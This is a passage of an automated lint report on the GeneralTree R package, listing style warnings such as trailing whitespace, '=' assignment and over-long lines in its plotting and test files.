superfluous.**\n```r\n​\n^\n```\n[R/plot.R:25:19:](https://github.com/abossenbroek/GeneralTree/blob/37c0d9ceda34eddf721d232f18c7251c065b8ba8/R/plot.R#L25) *warning:* **no visible global function definition for ‘generate_grViz’**\n```r\n​  tree_grGraph <- generate_grViz(x, ...)\n                  ^~~~~~~~~~~~~~\n```\n[R/plot.R:110:1:](https://github.com/abossenbroek/GeneralTree/blob/37c0d9ceda34eddf721d232f18c7251c065b8ba8/R/plot.R#L110) *style:* **Trailing blank lines are superfluous.**\n```r\n​\n^\n```\n[R/print.R:25:8:](https://github.com/abossenbroek/GeneralTree/blob/37c0d9ceda34eddf721d232f18c7251c065b8ba8/R/print.R#L25) *style:* **Use <-, not =, for assignment.**\n```r\n​  dots = list(...)\n       ^\n```\n[R/print.R:28:15:](https://github.com/abossenbroek/GeneralTree/blob/37c0d9ceda34eddf721d232f18c7251c065b8ba8/R/print.R#L28) *style:* **Use <-, not =, for assignment.**\n```r\n​    dots$what = \"id\"\n              ^\n```\n[tests/testthat/test_AddNodes.R:104:1:](https://github.com/abossenbroek/GeneralTree/blob/37c0d9ceda34eddf721d232f18c7251c065b8ba8/tests/testthat/test_AddNodes.R#L104) *style:* **Trailing blank lines are superfluous.**\n```r\n​\n^\n```\n[tests/testthat/test_AddNodes.R:105:1:](https://github.com/abossenbroek/GeneralTree/blob/37c0d9ceda34eddf721d232f18c7251c065b8ba8/tests/testthat/test_AddNodes.R#L105) *style:* **Trailing blank lines are superfluous.**\n```r\n​\n^\n```\n[tests/testthat/test_casting.R:230:1:](https://github.com/abossenbroek/GeneralTree/blob/37c0d9ceda34eddf721d232f18c7251c065b8ba8/tests/testthat/test_casting.R#L230) *style:* **Trailing blank lines are superfluous.**\n```r\n​\n^\n```\n[tests/testthat/test_clone.R:63:26:](https://github.com/abossenbroek/GeneralTree/blob/37c0d9ceda34eddf721d232f18c7251c065b8ba8/tests/testthat/test_clone.R#L63) *style:* **Use <-, not =, for assignment.**\n```r\n​  branch_copy_assignment = tree$searchNode(\"b\")\n                         ^\n```\n[tests/testthat/test_clone.R:87:1:](https://github.com/abossenbroek/GeneralTree/blob/37c0d9ceda34eddf721d232f18c7251c065b8ba8/tests/testthat/test_clone.R#L87) *style:* **Trailing blank lines are superfluous.**\n```r\n​\n^\n```\n[tests/testthat/test_clone.R:88:1:](https://github.com/abossenbroek/GeneralTree/blob/37c0d9ceda34eddf721d232f18c7251c065b8ba8/tests/testthat/test_clone.R#L88) *style:* **Trailing blank lines are superfluous.**\n```r\n​\n^\n```\n[tests/testthat/test_GeneralTreeInternals.R:50:1:](https://github.com/abossenbroek/GeneralTree/blob/37c0d9ceda34eddf721d232f18c7251c065b8ba8/tests/testthat/test_GeneralTreeInternals.R#L50) *style:* **Trailing whitespace is superfluous.**\n```r\n​ \n^\n```\n[tests/testthat/test_GeneralTreeInternals.R:85:1:](https://github.com/abossenbroek/GeneralTree/blob/37c0d9ceda34eddf721d232f18c7251c065b8ba8/tests/testthat/test_GeneralTreeInternals.R#L85) *style:* **Trailing blank lines are superfluous.**\n```r\n​\n^\n```\n[tests/testthat/test_plot.R:33:85:](https://github.com/abossenbroek/GeneralTree/blob/37c0d9ceda34eddf721d232f18c7251c065b8ba8/tests/testthat/test_plot.R#L33) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \\\"1\\\" [label = \\\"1\\\", style = \\\"filled\\\", color = \\\"gray\\\", shape = \\\"rectangle\\\"] \n                                                                                    ^\n```\n[tests/testthat/test_plot.R:34:85:](https://github.com/abossenbroek/GeneralTree/blob/37c0d9ceda34eddf721d232f18c7251c065b8ba8/tests/testthat/test_plot.R#L34) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \\\"2\\\" [label = \\\"2\\\", style = \\\"filled\\\", color = \\\"gray\\\", shape = \\\"rectangle\\\"] \n                                                                                    ^\n```\n[tests/testthat/test_plot.R:35:85:](https://github.com/abossenbroek/GeneralTree/blob/37c0d9ceda34eddf721d232f18c7251c065b8ba8/tests/testthat/test_plot.R#L35) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \\\"3\\\" [label = \\\"3\\\", style = \\\"filled\\\", color = \\\"gray\\\", shape = \\\"rectangle\\\"] \n                                                                                    ^\n```\n[tests/testthat/test_plot.R:36:85:](https://github.com/abossenbroek/GeneralTree/blob/37c0d9ceda34eddf721d232f18c7251c065b8ba8/tests/testthat/test_plot.R#L36) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \\\"4\\\" [label = \\\"4\\\", style = \\\"filled\\\", color = \\\"gray\\\", shape = \\\"rectangle\\\"] \n                                                                                    ^\n```\n[tests/testthat/test_plot.R:37:85:](https://github.com/abossenbroek/GeneralTree/blob/37c0d9ceda34eddf721d232f18c7251c065b8ba8/tests/testthat/test_plot.R#L37) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \\\"5\\\" [label = \\\"5\\\", style = \\\"filled\\\", color = \\\"gray\\\", shape = \\\"rectangle\\\"] \n                                                                                    ^\n```\n[tests/testthat/test_plot.R:38:85:](https://github.com/abossenbroek/GeneralTree/blob/37c0d9ceda34eddf721d232f18c7251c065b8ba8/tests/testthat/test_plot.R#L38) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \\\"6\\\" [label = \\\"6\\\", style = \\\"filled\\\", color = \\\"gray\\\", shape = \\\"rectangle\\\"] \n                                                                                    ^\n```\n[tests/testthat/test_plot.R:39:85:](https://github.com/abossenbroek/GeneralTree/blob/37c0d9ceda34eddf721d232f18c7251c065b8ba8/tests/testthat/test_plot.R#L39) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \\\"7\\\" [label = \\\"7\\\", style = \\\"filled\\\", color = \\\"gray\\\", shape = \\\"rectangle\\\"] \n                                                                                    ^\n```\n[tests/testthat/test_plot.R:40:85:](https://github.com/abossenbroek/GeneralTree/blob/37c0d9ceda34eddf721d232f18c7251c065b8ba8/tests/testthat/test_plot.R#L40) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \\\"8\\\" [label = \\\"8\\\", style = \\\"filled\\\", color = \\\"gray\\\", shape = \\\"rectangle\\\"] \n                                                                                    ^\n```\n[tests/testthat/test_plot.R:41:85:](https://github.com/abossenbroek/GeneralTree/blob/37c0d9ceda34eddf721d232f18c7251c065b8ba8/tests/testthat/test_plot.R#L41) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \\\"9\\\" [label = \\\"9\\\", style = \\\"filled\\\", color = \\\"gray\\\", shape = \\\"rectangle\\\"] \n                                                                                    ^\n```\n[tests/testthat/test_plot.R:42:87:](https://github.com/abossenbroek/GeneralTree/blob/37c0d9ceda34eddf721d232f18c7251c065b8ba8/tests/testthat/test_plot.R#L42) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \\\"10\\\" [label = \\\"10\\\", style = \\\"filled\\\", color = \\\"gray\\\", shape = \\\"rectangle\\\"] \n                                                                                      ^\n```\n[tests/testthat/test_plot.R:43:87:](https://github.com/abossenbroek/GeneralTree/blob/37c0d9ceda34eddf721d232f18c7251c065b8ba8/tests/testthat/test_plot.R#L43) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \\\"11\\\" [label = \\\"11\\\", style = \\\"filled\\\", color = \\\"gray\\\", shape = \\\"rectangle\\\"] \n                                                                                      ^\n```\n[tests/testthat/test_plot.R:44:87:](https://github.com/abossenbroek/GeneralTree/blob/37c0d9ceda34eddf721d232f18c7251c065b8ba8/tests/testthat/test_plot.R#L44) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \\\"12\\\" [label = \\\"12\\\", style = \\\"filled\\\", color = \\\"gray\\\", shape = \\\"rectangle\\\"] \n                                                                                      ^\n```\n[tests/testthat/test_plot.R:45:87:](https://github.com/abossenbroek/GeneralTree/blob/37c0d9ceda34eddf721d232f18c7251c065b8ba8/tests/testthat/test_plot.R#L45) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \\\"13\\\" [label = \\\"13\\\", style = \\\"filled\\\", color = \\\"gray\\\", shape = \\\"rectangle\\\"] \n                                                                                      ^\n```\n[tests/testthat/test_plot.R:46:87:](https://github.com/abossenbroek/GeneralTree/blob/37c0d9ceda34eddf721d232f18c7251c065b8ba8/tests/testthat/test_plot.R#L46) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \\\"14\\\" [label = \\\"14\\\", style = \\\"filled\\\", color = \\\"gray\\\", shape = \\\"rectangle\\\"] \n                                                                                      ^\n```\n[tests/testthat/test_plot.R:47:15:](https://github.com/abossenbroek/GeneralTree/blob/37c0d9ceda34eddf721d232f18c7251c065b8ba8/tests/testthat/test_plot.R#L47) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \\\"1\\\"->\\\"2\\\" \n              ^\n```\n[tests/testthat/test_plot.R:48:15:](https://github.com/abossenbroek/GeneralTree/blob/37c0d9ceda34eddf721d232f18c7251c065b8ba8/tests/testthat/test_plot.R#L48) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \\\"1\\\"->\\\"7\\\" \n              ^\n```\n[tests/testthat/test_plot.R:49:15:](https://github.com/abossenbroek/GeneralTree/blob/37c0d9ceda34eddf721d232f18c7251c065b8ba8/tests/testthat/test_plot.R#L49) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \\\"1\\\"->\\\"8\\\" \n              ^\n```\n[tests/testthat/test_plot.R:50:15:](https://github.com/abossenbroek/GeneralTree/blob/37c0d9ceda34eddf721d232f18c7251c065b8ba8/tests/testthat/test_plot.R#L50) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \\\"2\\\"->\\\"3\\\" \n              ^\n```\n[tests/testthat/test_plot.R:51:15:](https://github.com/abossenbroek/GeneralTree/blob/37c0d9ceda34eddf721d232f18c7251c065b8ba8/tests/testthat/test_plot.R#L51) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \\\"2\\\"->\\\"6\\\" \n              ^\n```\n[tests/testthat/test_plot.R:52:15:](https://github.com/abossenbroek/GeneralTree/blob/37c0d9ceda34eddf721d232f18c7251c065b8ba8/tests/testthat/test_plot.R#L52) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \\\"3\\\"->\\\"4\\\" \n              ^\n```\n[tests/testthat/test_plot.R:53:15:](https://github.com/abossenbroek/GeneralTree/blob/37c0d9ceda34eddf721d232f18c7251c065b8ba8/tests/testthat/test_plot.R#L53) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \\\"3\\\"->\\\"5\\\" \n              ^\n```\n[tests/testthat/test_plot.R:54:15:](https://github.com/abossenbroek/GeneralTree/blob/37c0d9ceda34eddf721d232f18c7251c065b8ba8/tests/testthat/test_plot.R#L54) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \\\"8\\\"->\\\"9\\\" \n              ^\n```\n[tests/testthat/test_plot.R:55:16:](https://github.com/abossenbroek/GeneralTree/blob/37c0d9ceda34eddf721d232f18c7251c065b8ba8/tests/testthat/test_plot.R#L55) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \\\"8\\\"->\\\"14\\\" \n               ^\n```\n[tests/testthat/test_plot.R:56:16:](https://github.com/abossenbroek/GeneralTree/blob/37c0d9ceda34eddf721d232f18c7251c065b8ba8/tests/testthat/test_plot.R#L56) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \\\"9\\\"->\\\"10\\\" \n               ^\n```\n[tests/testthat/test_plot.R:57:16:](https://github.com/abossenbroek/GeneralTree/blob/37c0d9ceda34eddf721d232f18c7251c065b8ba8/tests/testthat/test_plot.R#L57) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \\\"9\\\"->\\\"11\\\" \n               ^\n```\n[tests/testthat/test_plot.R:58:16:](https://github.com/abossenbroek/GeneralTree/blob/37c0d9ceda34eddf721d232f18c7251c065b8ba8/tests/testthat/test_plot.R#L58) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \\\"9\\\"->\\\"12\\\" \n               ^\n```\n[tests/testthat/test_plot.R:59:17:](https://github.com/abossenbroek/GeneralTree/blob/37c0d9ceda34eddf721d232f18c7251c065b8ba8/tests/testthat/test_plot.R#L59) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \\\"12\\\"->\\\"13\\\" \n                ^\n```\n[tests/testthat/test_plot.R:63:1:](https://github.com/abossenbroek/GeneralTree/blob/37c0d9ceda34eddf721d232f18c7251c065b8ba8/tests/testthat/test_plot.R#L63) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[tests/testthat/test_plot.R:67:94:](https://github.com/abossenbroek/GeneralTree/blob/37c0d9ceda34eddf721d232f18c7251c065b8ba8/tests/testthat/test_plot.R#L67) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \\\"parent1\\\" [label = \\\"parent1\\\", color = \\\"cyan\\\", shape = \\\"circle\\\", style = \\\"filled\\\"] \n                                                                                             ^\n```\n[tests/testthat/test_plot.R:68:98:](https://github.com/abossenbroek/GeneralTree/blob/37c0d9ceda34eddf721d232f18c7251c065b8ba8/tests/testthat/test_plot.R#L68) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \\\"child.1.2\\\" [label = \\\"child.1.2\\\", color = \\\"cyan\\\", shape = \\\"circle\\\", style = \\\"filled\\\"] \n                                                                                                 ^\n```\n[tests/testthat/test_plot.R:69:98:](https://github.com/abossenbroek/GeneralTree/blob/37c0d9ceda34eddf721d232f18c7251c065b8ba8/tests/testthat/test_plot.R#L69) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \\\"child.2.3\\\" [label = \\\"child.2.3\\\", color = \\\"cyan\\\", shape = \\\"circle\\\", style = \\\"filled\\\"] \n                                                                                                 ^\n```\n[tests/testthat/test_plot.R:70:98:](https://github.com/abossenbroek/GeneralTree/blob/37c0d9ceda34eddf721d232f18c7251c065b8ba8/tests/testthat/test_plot.R#L70) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \\\"child.3.4\\\" [label = \\\"child.3.4\\\", color = \\\"cyan\\\", shape = \\\"circle\\\", style = \\\"filled\\\"] \n                                                                                                 ^\n```\n[tests/testthat/test_plot.R:71:98:](https://github.com/abossenbroek/GeneralTree/blob/37c0d9ceda34eddf721d232f18c7251c065b8ba8/tests/testthat/test_plot.R#L71) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \\\"child.3.5\\\" [label = \\\"child.3.5\\\", color = \\\"cyan\\\", shape = \\\"circle\\\", style = \\\"filled\\\"] \n                                                                                                 ^\n```\n[tests/testthat/test_plot.R:72:98:](https://github.com/abossenbroek/GeneralTree/blob/37c0d9ceda34eddf721d232f18c7251c065b8ba8/tests/testthat/test_plot.R#L72) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \\\"child.2.6\\\" [label = \\\"child.2.6\\\", color = \\\"cyan\\\", shape = \\\"circle\\\", style = \\\"filled\\\"] \n                                                                                                 ^\n```\n[tests/testthat/test_plot.R:73:98:](https://github.com/abossenbroek/GeneralTree/blob/37c0d9ceda34eddf721d232f18c7251c065b8ba8/tests/testthat/test_plot.R#L73) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \\\"child.1.7\\\" [label = \\\"child.1.7\\\", color = \\\"cyan\\\", shape = \\\"circle\\\", style = \\\"filled\\\"] \n                                                                                                 ^\n```\n[tests/testthat/test_plot.R:74:98:](https://github.com/abossenbroek/GeneralTree/blob/37c0d9ceda34eddf721d232f18c7251c065b8ba8/tests/testthat/test_plot.R#L74) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \\\"child.1.8\\\" [label = \\\"child.1.8\\\", color = \\\"cyan\\\", shape = \\\"circle\\\", style = \\\"filled\\\"] \n                                                                                                 ^\n```\n[tests/testthat/test_plot.R:75:98:](https://github.com/abossenbroek/GeneralTree/blob/37c0d9ceda34eddf721d232f18c7251c065b8ba8/tests/testthat/test_plot.R#L75) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \\\"child.8.9\\\" [label = \\\"child.8.9\\\", color = \\\"cyan\\\", shape = \\\"circle\\\", style = \\\"filled\\\"] \n                                                                                                 ^\n```\n[tests/testthat/test_plot.R:76:100:](https://github.com/abossenbroek/GeneralTree/blob/37c0d9ceda34eddf721d232f18c7251c065b8ba8/tests/testthat/test_plot.R#L76) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \\\"child.9.10\\\" [label = \\\"child.9.10\\\", color = \\\"cyan\\\", shape = \\\"circle\\\", style = \\\"filled\\\"] \n                                                                                                   ^\n```\n[tests/testthat/test_plot.R:77:100:](https://github.com/abossenbroek/GeneralTree/blob/37c0d9ceda34eddf721d232f18c7251c065b8ba8/tests/testthat/test_plot.R#L77) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \\\"child.9.11\\\" [label = \\\"child.9.11\\\", color = \\\"cyan\\\", shape = \\\"circle\\\", style = \\\"filled\\\"] \n                                                                                                   ^\n```\n[tests/testthat/test_plot.R:78:100:](https://github.com/abossenbroek/GeneralTree/blob/37c0d9ceda34eddf721d232f18c7251c065b8ba8/tests/testthat/test_plot.R#L78) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \\\"child.9.12\\\" [label = \\\"child.9.12\\\", color = \\\"cyan\\\", shape = \\\"circle\\\", style = \\\"filled\\\"] \n                                                                                                   ^\n```\n[tests/testthat/test_plot.R:79:102:](https://github.com/abossenbroek/GeneralTree/blob/37c0d9ceda34eddf721d232f18c7251c065b8ba8/tests/testthat/test_plot.R#L79) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \\\"child.12.13\\\" [label = \\\"child.12.13\\\", color = \\\"cyan\\\", shape = \\\"circle\\\", style = \\\"filled\\\"] \n                                                                                                     ^\n```\n[tests/testthat/test_plot.R:80:100:](https://github.com/abossenbroek/GeneralTree/blob/37c0d9ceda34eddf721d232f18c7251c065b8ba8/tests/testthat/test_plot.R#L80) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \\\"child.8.14\\\" [label = \\\"child.8.14\\\", color = \\\"cyan\\\", shape = \\\"circle\\\", style = \\\"filled\\\"] \n                                                                                                   ^\n```\n[tests/testthat/test_plot.R:81:29:](https://github.com/abossenbroek/GeneralTree/blob/37c0d9ceda34eddf721d232f18c7251c065b8ba8/tests/testthat/test_plot.R#L81) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \\\"parent1\\\"->\\\"child.1.2\\\" \n                            ^\n```\n[tests/testthat/test_plot.R:82:29:](https://github.com/abossenbroek/GeneralTree/blob/37c0d9ceda34eddf721d232f18c7251c065b8ba8/tests/testthat/test_plot.R#L82) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \\\"parent1\\\"->\\\"child.1.7\\\" \n                            ^\n```\n[tests/testthat/test_plot.R:83:29:](https://github.com/abossenbroek/GeneralTree/blob/37c0d9ceda34eddf721d232f18c7251c065b8ba8/tests/testthat/test_plot.R#L83) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \\\"parent1\\\"->\\\"child.1.8\\\" \n                            ^\n```\n[tests/testthat/test_plot.R:84:31:](https://github.com/abossenbroek/GeneralTree/blob/37c0d9ceda34eddf721d232f18c7251c065b8ba8/tests/testthat/test_plot.R#L84) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \\\"child.1.2\\\"->\\\"child.2.3\\\" \n                              ^\n```\n[tests/testthat/test_plot.R:85:31:](https://github.com/abossenbroek/GeneralTree/blob/37c0d9ceda34eddf721d232f18c7251c065b8ba8/tests/testthat/test_plot.R#L85) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \\\"child.1.2\\\"->\\\"child.2.6\\\" \n                              ^\n```\n[tests/testthat/test_plot.R:86:31:](https://github.com/abossenbroek/GeneralTree/blob/37c0d9ceda34eddf721d232f18c7251c065b8ba8/tests/testthat/test_plot.R#L86) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \\\"child.2.3\\\"->\\\"child.3.4\\\" \n                              ^\n```\n[tests/testthat/test_plot.R:87:31:](https://github.com/abossenbroek/GeneralTree/blob/37c0d9ceda34eddf721d232f18c7251c065b8ba8/tests/testthat/test_plot.R#L87) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \\\"child.2.3\\\"->\\\"child.3.5\\\" \n                              ^\n```\n[tests/testthat/test_plot.R:88:31:](https://github.com/abossenbroek/GeneralTree/blob/37c0d9ceda34eddf721d232f18c7251c065b8ba8/tests/testthat/test_plot.R#L88) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \\\"child.1.8\\\"->\\\"child.8.9\\\" \n                              ^\n```\n[tests/testthat/test_plot.R:89:32:](https://github.com/abossenbroek/GeneralTree/blob/37c0d9ceda34eddf721d232f18c7251c065b8ba8/tests/testthat/test_plot.R#L89) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \\\"child.1.8\\\"->\\\"child.8.14\\\" \n                               ^\n```\n[tests/testthat/test_plot.R:90:32:](https://github.com/abossenbroek/GeneralTree/blob/37c0d9ceda34eddf721d232f18c7251c065b8ba8/tests/testthat/test_plot.R#L90) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \\\"child.8.9\\\"->\\\"child.9.10\\\" \n                               ^\n```\n[tests/testthat/test_plot.R:91:32:](https://github.com/abossenbroek/GeneralTree/blob/37c0d9ceda34eddf721d232f18c7251c065b8ba8/tests/testthat/test_plot.R#L91) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \\\"child.8.9\\\"->\\\"child.9.11\\\" \n                               ^\n```\n[tests/testthat/test_plot.R:92:32:](https://github.com/abossenbroek/GeneralTree/blob/37c0d9ceda34eddf721d232f18c7251c065b8ba8/tests/testthat/test_plot.R#L92) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \\\"child.8.9\\\"->\\\"child.9.12\\\" \n                               ^\n```\n[tests/testthat/test_plot.R:93:34:](https://github.com/abossenbroek/GeneralTree/blob/37c0d9ceda34eddf721d232f18c7251c065b8ba8/tests/testthat/test_plot.R#L93) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \\\"child.9.12\\\"->\\\"child.12.13\\\" \n                                 ^\n```\n[tests/testthat/test_plot.R:95:1:](https://github.com/abossenbroek/GeneralTree/blob/37c0d9ceda34eddf721d232f18c7251c065b8ba8/tests/testthat/test_plot.R#L95) *style:* **Trailing whitespace is superfluous.**\n```r\n​ \n^\n```\n[tests/testthat/test_plot.R:104:1:](https://github.com/abossenbroek/GeneralTree/blob/37c0d9ceda34eddf721d232f18c7251c065b8ba8/tests/testthat/test_plot.R#L104) *style:* **Trailing blank lines are superfluous.**\n```r\n​\n^\n```\n[tests/testthat/test_plot.R:105:1:](https://github.com/abossenbroek/GeneralTree/blob/37c0d9ceda34eddf721d232f18c7251c065b8ba8/tests/testthat/test_plot.R#L105) *style:* **Trailing blank lines are superfluous.**\n```r\n​\n^\n```\n[tests/testthat/test_print.R:13:1:](https://github.com/abossenbroek/GeneralTree/blob/37c0d9ceda34eddf721d232f18c7251c065b8ba8/tests/testthat/test_print.R#L13) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[tests/testthat/test_print.R:43:1:](https://github.com/abossenbroek/GeneralTree/blob/37c0d9ceda34eddf721d232f18c7251c065b8ba8/tests/testthat/test_print.R#L43) *style:* **lines should not be more than 120 characters.**\n```r\n​  expect_identical(tree$toString(what = \"id\"), \"root --> child1 --> child4\\n     |          |-> child5\\n     |          \\\\-> child6\\n     |-> child2\\n     \\\\-> child3\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test_print.R:63:1:](https://github.com/abossenbroek/GeneralTree/blob/37c0d9ceda34eddf721d232f18c7251c065b8ba8/tests/testthat/test_print.R#L63) *style:* **lines should not be more than 120 characters.**\n```r\n​  expect_identical(tree$toString(what = \"id\"), \"root --> child1 --> ten\\n     |          |-> eleven\\n     |          \\\\-> twelve\\n     |-> child2 --> child4\\n     |          |-> child5 --> leaf7\\n     |          |          |-> child8\\n     |          |          \\\\-> child9\\n     |          \\\\-> 6\\n     \\\\-> child3\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test_print.R:84:1:](https://github.com/abossenbroek/GeneralTree/blob/37c0d9ceda34eddf721d232f18c7251c065b8ba8/tests/testthat/test_print.R#L84) *style:* **lines should not be more than 120 characters.**\n```r\n​  expect_identical(res, \"parent1 --> child1.1 --> child1.ten\\n        |            |-> child1.eleven\\n        |            \\\\-> child1.twelve\\n        |-> child1.2 --> child1.4\\n        |            |-> child1.5 --> child5.7\\n        |            |            |-> child5.8\\n        |            |            \\\\-> child5.9\\n        |            \\\\-> child1.6\\n        \\\\-> child1.3\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test_print.R:105:1:](https://github.com/abossenbroek/GeneralTree/blob/37c0d9ceda34eddf721d232f18c7251c065b8ba8/tests/testthat/test_print.R#L105) *style:* **lines should not be more than 120 characters.**\n```r\n​  expect_identical(tree$toString(what = c(\"id\", \"data\")), \"root : parent1 --> child1 : child1.1 --> ten : child1.ten\\n               |                     |-> eleven : child1.eleven\\n               |                     \\\\-> twelve : child1.twelve\\n               |-> child2 : child1.2 --> child4 : child1.4\\n               |                     |-> child5 : child1.5 --> leaf7 : child5.7\\n               |                     |                     |-> child8 : child5.8\\n               |                     |                     \\\\-> child9 : child5.9\\n               |                     \\\\-> 6 : child1.6\\n               \\\\-> child3 : child1.3\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test_print.R:121:1:](https://github.com/abossenbroek/GeneralTree/blob/37c0d9ceda34eddf721d232f18c7251c065b8ba8/tests/testthat/test_print.R#L121) *style:* **lines should not be more than 120 characters.**\n```r\n​  expect_identical(tree$toString(), \"0 : parent1 --> 1 : child.1\\n            |-> 2 : child.2\\n            \\\\-> 3 : child.3 --> 4 : child.3.4\\n                            |-> 5 : child.3.5\\n                            |-> 6 : child.3.6\\n                            \\\\-> 7 : child.3.7 --> 8 : child.7.8\\n                                              |-> 9 : child.7.9\\n                                              \\\\-> 10 : 